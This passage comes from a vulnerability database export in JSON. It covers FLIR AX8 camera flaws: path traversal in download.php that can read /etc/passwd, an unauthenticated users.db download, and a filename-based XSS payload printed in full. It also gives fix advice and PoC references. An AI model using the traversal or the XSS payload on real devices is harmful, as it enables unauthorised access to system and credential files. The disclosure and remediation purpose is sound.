\n\nThe endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. \n\nThe error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. \n\n3. Improper Access Control. \n\nThe endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. \n\n4. Reflected cross-site scripting. \n\nIn the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call \n\n\u003cimg src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));\u003e.run\n\n\n### Recommendations for how to fix the 4 vulnerabilities:\n\n* Vulnerability 1: The variable `$_POST[\"id\"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. \n\nMore info: \nhttps://www.php.net/intval\nhttps://www.php.net/manual/en/function.escapeshellcmd\nhttps://www.php.net/manual/en/function.escapeshellarg\n\n\n* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. \n\nMore info:\nhttps://www.php.net/manual/en/function.pathinfo\n\n* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. \n\nMore info:\nhttps://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html\n\n* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. \n\nMore info: \nhttps://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n### Reference:\nhttps://www.flir.com/products/ax8-automation/\n\n### Security researchers:\n* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)\n* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) \n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          }
        ],
        "trust": 1.8
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.zeroscience.mk/codes/flir_ax8_fd.txt",
            "trust": 0.1,
            "type": "poc"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-37060",
            "trust": 3.3
          },
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493",
            "trust": 2.5
          },
          {
            "db": "PACKETSTORM",
            "id": "168116",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080059",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "149798",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45597",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "id": "VAR-202208-1438",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2023-12-18T11:55:42.463000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.0
          },
          {
            "problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "http://packetstormsecurity.com/files/168116/flir-ax8-1.46.16-traversal-access-control-command-injection-xss.html"
          },
          {
            "trust": 2.5,
            "url": "https://www.flir.com/products/ax8-automation/"
          },
          {
            "trust": 2.4,
            "url": "https://gist.github.com/nwqda/9e16852ab7827dc62b8e44d6180a6899"
          },
          {
            "trust": 2.4,
            "url": "https://www.zeroscience.mk/en/vulnerabilities/zsl-2018-5493.php"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37060"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-37060/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080059"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/security/best-practices-for-cybersecurity/"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf"
          },
          {
            "trust": 0.1,
            "url": "https://www.flir.com/globalassets/security/cybersecurity-bulletin-10-12-18.pdf"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/45597/"
          },
          {
            "trust": 0.1,
            "url": "https://packetstormsecurity.com/files/149798"
          },
          {
            "trust": 0.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/151285"
          },
          {
            "trust": 0.1,
            "url": "https://cheatsheetseries.owasp.org/cheatsheets/cross_site_scripting_prevention_cheat_sheet.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/intval"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/thomasjknudsen)"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37062"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.pathinfo"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellcmd"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37061"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/samy-younsi)"
          },
          {
            "trust": 0.1,
            "url": "https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellarg"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37063"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-14T00:00:00",
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "date": "2023-09-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "date": "2022-08-19T19:24:22",
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "date": "2022-08-18T17:15:08.033000",
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "date": "2022-08-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-17T00:00:00",
            "db": "ZSL",
            "id": "ZSL-2018-5493"
          },
          {
            "date": "2023-09-22T08:25:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          },
          {
            "date": "2022-12-12T21:11:38.377000",
            "db": "NVD",
            "id": "CVE-2022-37060"
          },
          {
            "date": "2022-11-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0flir\u00a0ax8\u00a0 Path traversal vulnerability in firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014926"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3364"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202106-2014

    Vulnerability from variot - Updated: 2022-05-04 09:02

    Teledyne FLIR focuses on the design, development, production, marketing and promotion of professional technologies for enhancing situational awareness.

    FLIR-AX8 has an arbitrary file download vulnerability. Attackers can use vulnerabilities to download related system configuration files.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202106-2014",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "flir",
            "version": "71213294"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "flir",
            "version": "71219303"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2021-39018",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2021-39018",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Teledyne FLIR focuses on the design, development, production, marketing and promotion of professional technologies for enhancing situational awareness.\n\r\n\r\nFLIR-AX8 has an arbitrary file download vulnerability. Attackers can use vulnerabilities to download related system configuration files.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "id": "VAR-202106-2014",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "last_update_date": "2022-05-04T09:02:08.760000Z",
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR-AX8 has an arbitrary file download vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-39018"
          }
        ],
        "trust": 0.6
      }
    }